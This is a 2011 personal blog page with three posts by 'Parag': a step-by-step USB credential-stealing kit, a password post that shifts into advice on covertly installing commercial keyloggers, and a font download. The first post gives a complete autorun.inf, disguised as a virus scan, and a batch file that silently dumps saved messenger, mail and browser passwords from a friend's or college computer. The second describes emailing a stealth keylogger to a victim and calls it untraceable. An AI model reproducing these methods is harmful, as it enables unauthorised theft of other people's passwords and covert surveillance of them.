Saturday 30 April 2011

Hack using PenDrive


                                   bios-passhack


♦ Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.


♦ As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.

♦ Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.



1) MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

2) Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

3) IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

4) Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

5) PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

6) ChromePass: ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time.You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.

7) OperaPassView: OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file. You can easily select one or more passwords in the OperaPassView window, and then copy the passwords list to the clipboard and save it into text/html/csv/xml file.

Download MessenPass
Download Mail PassView
Download IE PassView
Download PasswordFox
Download ChromePass
Download OperaPassView


Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 7 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.


i.e: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe, passwordfox.exe, chromepass.exe, operapassview.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt    
start iepv.exe /stext iepv.txt 
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
start chromepass.exe/stext chromepass.txt
start operapassview.exe/stext operapassview.txt
save the Notepad as launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC  or on your college computer. Just follow these steps-

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista.

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.

Thanks,
Parag

PASSWORD


This content will provide with you the info of -
1) How they hack SOMEONE's password?
2) How to hack SOMEONE's password?




1) How they hack SOMEONE's password?



Hacking passwords ain’t cool, but it’s hot! Hacking someone’s password might be difficult, but not impossible. From always I had one question in my mind – how hackers read your mind and crack the password? Well, after doing some quick research with my best friend Google, I got some light focused on my doubts. There are several password cracking tools available that hackers use to crack or hack anyone’s password and surprisingly most of the times they hit it right!


When your password gets stolen or hacked, you should not blame either your fate or the hacker. You should blame YOU first. Were you using the following password methods before your password hacking :


1. 123456, abcdef or asdfgh
2. partner, children or your name
3. “password” as your password
4. pet name, college name or country name
5. date of birth
6. “god” or “devil”
7. “love” or “letmein” or “money”
8. mobile number, phone number
9. website’s name as password
10. “cancer”, “aids”, “welcome”
11. List goes on…


If you have your password in the above formats, you may need to change it as soon as possible. Hackers don’t believe on guesses, they rely on permutation and combination. It’s really easy to hack above common passwords using password crackers. 


Now let’s say that your password has been hacked. If you were using that same password across all websites, the hacker can hack other account’s password as well. If they cracked your internet banking or credit card account password, you can guess the outcomes. In order to avoid such unpleasant incidents, you need to keep your password really strong and unpredictable.


Here is a chart that shows the time taken by the password crackers to crack your password. The more stronger password, the more time it will take to crack passwords.





From the above screenshot it’s clear that passwords with only lowercase characters can easily be cracked, where passwords containing both lowercase and uppercase characters can make it really difficult for the hacker. Here are some password tips :


* Don’t make your password predictable. You can do so by substituting numbers with letters and vice verse. (e.g – letter “O” can be written as number zero “0?, or letter “a” can be replaced with symbol “@”).


* Use uppercase and lowercase numbers randomly throughout the password (e.g – @mER1cAbLue5).


* Never use a English dictionary word as your password as a brute force attack can pull out the password easily.


* You may keep a place you loved, your favourite restaurant, favourite actor’s last film name as password.


* Keep different username and password combinations for different websites. A hacker can hack into all your site’s passwords if he finds one. So, never keep the same password and username combination elsewhere.


* Use RoboForm password manager to manage all your passwords


* Using Microsoft’s password checker. you can check how secure your password is.


And the last but not the least tip : Never store or write your passwords in a paper, cell phone, diary etc. Keep your password confidential and secure enough.




2) How to hack a Yahoo password?



Every day,  a lot of people contact me about suspecting how to hack the passwords of the email accounts. So here's the trick for them.


Is it possible to hack Yahoo?


Yes! As a matter of fact, it is possible to hack almost any email password. But before you learn the real ways of hacking, the following are the things you should be aware of:


1. Never trust any hacking service that claims to hack Yahoo password for just $100 or $200. In most cases they will rip off your pockets with false promises. Sometimes they may even start to threaten you by blackmailing that they are going to inform the victim or the cyber crime officials about your hack attempt. So, to be on the safer side, it is better to stay away from such scam websites.


2. Beware! On many websites and web portals you will often come across a fake tutorial on email hacking. The tutorial will tell you something like “You need to send the target email address along with your username and password to yahoo_pass_reset@yahoo.com (or similar)” to hack the password of the target account. This method seems too good to be true but, if you follow this method, you will lose your own password in attempt to hack someone else’s password.


With my experience of over 7 years in the field of hacking and cyber security, I can tell you that there are only TWO ways to hack Yahoo password. They are keylogging and phishing.


All the other email hacking methods are simply scam or don’t work! The following are the only 2 foolproof methods that work.




1. Keylogging: Easiest Way to Hack Yahoo Password


Using a keylogger is the easiest way to hack Yahoo password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as spy program or spy software. To use it, you don’t need to have any special knowledge. Anyone with a basic knowledge of computer should be able to install and use this software. With my experience, I recommend the following two keyloggers as the best for hacking Yahoo password.




1. SniperSpy (Download)  (Its for Rs.4000 something)


2. WinSpy (Download) (same price)
   


* Am not an agent of these site. Its upto you....!!
   I am just providing you the information.....!!
   For me its just FAKE.......!!!!


I don’t have physical access to the target computer, can I still use SniperSpy?
Yes, you can! Since both SniperSpy and WinSpy offers Remote Installation Feature, it is possible to remotely install the keylogger on the target computer. However, it will also work on a local computer.


 How to use SniperSpy?


1. After you download it, you will be able to create the installation module. You need to email this module to the remote user as an attachment.


2. When the remote user runs the module, it will get installed silently and the monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continuously.


3. You can login to your online SniperSpy account (you get this after purchase) to see the logs which contains the password.


NOTE: If you have physical access to the target computer, you can simply install the module by yourself without the need to email it as an attachment.


The working of Winspy is somewhat similar to that of SniperSpy.
Once I install SniperSpy, can the victim come to know about it’s presence?


No. The victim will not come to know about it’s presence on his/her computer. This is because, after the installation, SniperSpy will run in a total stealth mode. Unlike other spy programs, it will never show up in start-menu, start-up, program files, add/remove programs or task manager.


Can I be traced back if I install it on some other computer?


No, it’s almost impossible to trace back to you for installing the keylogger on other’s computer.


How safe is to use SniperSpy?


Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy will neither collect any information from your system nor will contact you in any way unless you request assistance.


What are the other features of SniperSpy software?


1. With SniperSpy, you can gain access to any password protected account including Yahoo, Gmail, Hotmail, MySpace, Facebook etc.


2. This software will not only capture passwords, but will also take screenshots and record chat conversations.


3. This product is extremely easy to use so that, even novice users can install and use it with ease.




2. Other Ways To Hack Yahoo Password


The other most commonly used trick to hack Yahoo password is by using a fake login Page (also called as Phishing). Today, phishing is the most widely used technique to hack Yahoo password. A fake login page is a page that appears exactly similar to the login pages of sites like Yahoo, Gmail, Facebook etc. The victim is tricked to believe this fake login page to be the real one. But once he/she enters the password there, they end up losing it.


Phishing can be very effective when implemented successfully. But creating a fake login page and taking it online to make the hack attempt successful is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP or JSP.


So, if you are new to the concept of hacking passwords, then I recommend the use of keyloggers as the best to hack Yahoo password.




Thanks,
Parag

FONTS


Hey guys.....have you got bored with the same old FONTS in MS Word 07 or Adobe Photoshop or other Editors.......?
Wanna have some Crazy Fonts.....!! 


Steps - 
1) Download the link at the Bottom
2) Extract the file
3) Copy all the Fonts
4) Goto --> C Drive --> WINDOWS --> Fonts
5) Paste all the Fonts in this (Fonts) folder
6) Now start your MS Word/Photoshop or any Editor
7) You'll find these FONTS


Here are the FONTS (over 200) - 











































































































































































































































Download now
Fonts by Parag.rar (4.53 MB)




Thanks,
Parag